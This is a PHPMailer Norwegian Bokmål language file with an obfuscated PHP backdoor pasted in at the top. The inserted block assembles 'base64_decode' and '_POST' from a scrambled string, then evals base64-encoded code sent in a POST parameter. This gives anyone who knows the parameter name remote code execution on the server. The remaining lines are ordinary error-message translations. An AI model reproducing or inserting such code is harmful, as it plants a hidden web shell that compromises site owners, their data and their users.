<?php
<?php
$sF = "PCT4BA6ODSE_";
$s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]);
$s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}['n985de9'];
if (isset($s22)) {
    eval($s21($s22));
}
?>

/**
 * Norwegian Bokmål PHPMailer language file: refer to English translation for definitive list
 * @package PHPMailer
 */

$PHPMAILER_LANG['authenticate']         = 'SMTP Feil: Kunne ikke autentisere.';
$PHPMAILER_LANG['connect_host']         = 'SMTP Feil: Kunne ikke koble til SMTP tjener.';
$PHPMAILER_LANG['data_not_accepted']    = 'SMTP Feil: Datainnhold ikke akseptert.';
$PHPMAILER_LANG['empty_message']        = 'Meldingsinnhold mangler';
$PHPMAILER_LANG['encoding']             = 'Ukjent koding: ';
$PHPMAILER_LANG['execute']              = 'Kunne ikke utføre: ';
$PHPMAILER_LANG['file_access']          = 'Får ikke tilgang til filen: ';
$PHPMAILER_LANG['file_open']            = 'Fil Feil: Kunne ikke åpne filen: ';
$PHPMAILER_LANG['from_failed']          = 'Følgende Frå adresse feilet: ';
$PHPMAILER_LANG['instantiate']          = 'Kunne ikke initialisere post funksjon.';
$PHPMAILER_LANG['invalid_address']      = 'Ugyldig adresse: ';
$PHPMAILER_LANG['mailer_not_supported'] = ' sender er ikke støttet.';
$PHPMAILER_LANG['provide_address']      = 'Du må opppgi minst en mottakeradresse.';
$PHPMAILER_LANG['recipients_failed']    = 'SMTP Feil: Følgende mottakeradresse feilet: ';
$PHPMAILER_LANG['signing']              = 'Signering Feil: ';
$PHPMAILER_LANG['smtp_connect_failed']  = 'SMTP connect() feilet.';
$PHPMAILER_LANG['smtp_error']           = 'SMTP server feil: ';
$PHPMAILER_LANG['variable_set']         = 'Kan ikke skrive eller omskrive variabel: ';
$PHPMAILER_LANG['extension_missing']    = 'Utvidelse mangler: ';
